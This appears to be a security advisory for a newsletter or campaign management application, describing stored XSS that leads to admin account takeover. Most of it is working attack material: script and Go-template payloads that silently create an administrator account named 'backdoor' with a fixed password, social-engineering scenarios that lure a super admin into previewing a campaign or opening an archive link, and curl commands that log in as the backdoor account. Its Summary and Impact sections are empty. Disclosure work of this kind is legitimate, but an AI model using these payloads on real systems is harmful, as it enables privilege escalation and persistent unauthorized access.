Security Advisory: Stored XSS Leading to Admin Account Takeover

Summary

Required Attacker Permissions

campaigns:manage  - Create/edit campaigns
campaigns:get    - View campaigns 
lists:get all    - Access lists
templates:get    - Access templates

Attack Vectors

Vector 1: Raw HTML (Direct Script Tag)

<script>
fetch('/api/users', {
 method: 'POST',
 headers: {'Content-Type': 'application/json'},
 credentials: 'include',
 body: '{"username":"backdoor","email":"backdoor@evil.com","name":"Backdoor","password":"Hacked123","type":"user","status":"enabled","userRoleId":1,"user role id":1}'
});
</script>

Vector 2: Go Template Safe Function

{{ `<script>fetch('/api/users',{method:'POST',headers:{'Content-Type':'application/json'},credentials:'include',body:'{"username":"backdoor","email":"backdoor@evil.com","name":"Backdoor","password":"Hacked123","type":"user","status":"enabled","userRoleId":1,"user role id":1}'});</script>` | Safe }}

Attack Scenarios

Scenario 1: Campaign Preview Attack

1. Attacker creates campaign with XSS payload
2. Request is made to super admin: "Please review my newsletter draft"
3. Super admin opens campaign and clicks Preview
4. XSS executes → Backdoor admin account created
5. Attacker logs in with backdoor / Hacked123

Scenario 2: Archive Link Attack (No Click Required)

1. Attacker creates campaign with XSS payload
2. Attacker enables Archive for the campaign
3. Attacker shares archive link: http://localhost:9000/archive/{uuid}
4. Super admin visits the link (no preview click needed!)
5. XSS executes automatically → Account takeover

Proof of Concept

Step 1: Create Malicious Campaign

<script>
fetch('/api/users', {
 method: 'POST',
 headers: {'Content-Type': 'application/json'},
 credentials: 'include',
 body: JSON.stringify({
  username: 'backdoor',
  email: 'backdoor@evil.com', 
  name: 'Backdoor Admin',
  password: 'Hacked123',
  type: 'user',
  status: 'enabled',
  userRoleId: 1,
  user role id: 1
 })
});
</script>

Step 2: Enable Archive (Optional - for link-based attack)

1. Edit campaign settings
2. Enable "Archive"
3. Copy archive URL: http://localhost:9000/archive/{campaign-uuid}

Step 3: Trigger Execution

• Send campaign to super admin for "review"
• Super admin previews → XSS fires

• Share archive URL with super admin
• Super admin visits link → XSS fires automatically

Step 4: Verify Takeover

# Login as backdoor admin
curl -X POST "http://localhost:9000/admin/login" 
 -d "username=backdoor&password=Hacked123" 
 -c cookies.txt -L

# Verify super admin access
curl -b cookies.txt "http://localhost:9000/api/users"

Evidence Screenshots

[Screenshot 1: Lower-privileged user creating malicious campaign]

[Screenshot 2: Super admin previewing campaign]

[Screenshot 3: Backdoor user successfully created]

Impact

Affected Components